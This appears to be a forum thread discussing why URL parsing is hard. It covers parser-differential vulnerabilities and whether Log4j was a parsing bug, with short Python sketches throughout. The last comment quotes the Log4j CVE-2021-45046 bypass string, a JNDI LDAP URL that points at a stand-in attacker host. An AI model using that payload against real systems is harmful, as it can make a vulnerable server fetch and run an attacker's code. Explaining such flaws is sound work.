
Parsing a URL is really a pain in the a*


Another post in this thread was downvoted and flagged (really?) for claiming that URL parsing isn't difficult. The linked article claims that "Parsing URLs correctly is surprisingly hard." As a software tester, I'm very willing to believe that, but I don't know that the article really made the case.

I did find a paper describing some vulnerabilities in popular URL parsing libraries, including urllib and urllib3. Blog post here:

https://claroty.com/team82/research/exploiting-url-parsing-c...

Paper here:

https://web-assets.claroty.com/exploiting-url-parsing-confus...
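
The paper's findings mostly boil down to two parsers giving two different answers for the same string. As a rough, hypothetical sketch of that pattern using the two libraries named above (assuming urllib3 is installed; exact behaviour can vary by version):

    from urllib.parse import urlparse        # stdlib
    from urllib3.util import parse_url       # third-party: pip install urllib3

    url = "example.com/login"                # no scheme

    # urllib treats a scheme-less string as a bare path, so there is no host.
    print(urlparse(url).hostname)            # typically: None

    # urllib3 is more lenient and reads the leading component as the host.
    print(parse_url(url).host)               # typically: example.com

A validator built on one library and a fetcher built on the other can reach opposite conclusions about the same input, which is the general shape of the bugs in the paper.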

If you remember the Log4j vulnerability from a couple of years ago, that was a URL parsing bug.


> If you remember the Log4j vulnerability from a couple of years ago, that was a URL parsing bug.

I don't think that's a fair description of the issue.

The log4j vulnerability was that log4j specifically added JNDI support (https://issues.apache.org/jira/browse/LOG4J2-313) to property substitution (https://logging.apache.org/log4j/2.x/manual/configuration.ht...), which it applied to logged messages. So it was quite literally a feature of log4j: it would just pass the URL to JNDI for resolution and substitute the result.
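
To make that concrete without any Java, here is a hedged Python sketch of the same pattern (not log4j's actual code): a logger that expands ${prefix:key} lookups in the final message, including the parts that came from the user. The env: lookup here stands in for the real jndi: one, which resolves a URL over the network.

    import os
    import re

    # Hypothetical stand-in for log4j's lookup plugins ("jndi:", "env:", ...).
    LOOKUPS = {"env": lambda key: os.environ.get(key, "")}

    def log(message):
        # Substitution runs over the final message string, so ${...} sequences
        # inside user-supplied data get expanded too.
        def expand(match):
            prefix, _, key = match.group(1).partition(":")
            return LOOKUPS.get(prefix, lambda _k: match.group(0))(key)
        print(re.sub(r"\$\{([^}]*)\}", expand, message))

    user_agent = "${env:HOME}"                    # attacker-controlled input
    log("request from user-agent " + user_agent)  # prints the value of $HOME, if set

The point is that the lookup runs on attacker-controlled text by design, which is the sense in which it was a feature rather than a parsing bug.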


I didn't look into this in detail at the time, but the report's summary of CVE-2021-45046 is that the parser that validated a URL behaved differently from the separate parser used to fetch it, so a URL like

    jndi:ldap://127.0.0.1#.evilhost.com:1389/a
is validated as 127.0.0.1, which may be whitelisted, but fetched from evilhost.com, which probably isn't.
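
A minimal Python sketch of that disagreement (the real code path is in log4j's Java stack; this just mirrors the pattern on the inner ldap:// URL): a strict parser stops the host at the '#', while a hypothetical lenient one does not treat '#' as a delimiter at all.

    from urllib.parse import urlsplit

    url = "ldap://127.0.0.1#.evilhost.com:1389/a"

    # RFC 3986 parsing: the first '#' starts the fragment, so the authority
    # (and therefore the host) ends there.
    strict = urlsplit(url)
    print(strict.hostname)    # 127.0.0.1 -> passes an allow-list of local hosts
    print(strict.fragment)    # .evilhost.com:1389/a

    # Hypothetical lenient parser: the host is everything between '://' and
    # the first '/', minus a trailing ':port'; the '#' stays in the name.
    lenient_host = url.split("://", 1)[1].split("/", 1)[0].rsplit(":", 1)[0]
    print(lenient_host)       # 127.0.0.1#.evilhost.com

Whichever component actually opens the connection sees the second answer, so the allow-list check and the fetch end up talking about different hosts.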



